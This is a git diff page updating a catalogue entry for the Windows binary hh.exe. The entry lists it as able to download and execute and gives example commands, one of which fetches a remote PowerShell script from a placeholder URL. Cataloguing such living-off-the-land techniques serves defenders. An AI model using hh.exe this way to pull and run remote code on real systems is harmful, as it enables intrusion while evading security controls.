Update Hh.md
parent
48057a3987
commit
526db8eddb
|
@ -1,15 +1,15 @@
|
|||
## hh.exe
|
||||
|
||||
* Functions: Open Explorer, Download, Execute
|
||||
* Functions: Download, Execute
|
||||
|
||||
```
|
||||
HH.exe http://www.google.com
|
||||
|
||||
HH.exe C:\
|
||||
HH.exe C:\
|
||||
|
||||
HH.exe c:\windows\system32\calc.exe
|
||||
HH.exe c:\windows\system32\calc.exe
|
||||
|
||||
HH.exe http://some.url/script.ps1
|
||||
HH.exe http://some.url/script.ps1
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
|
|
Loading…
Reference in New Issue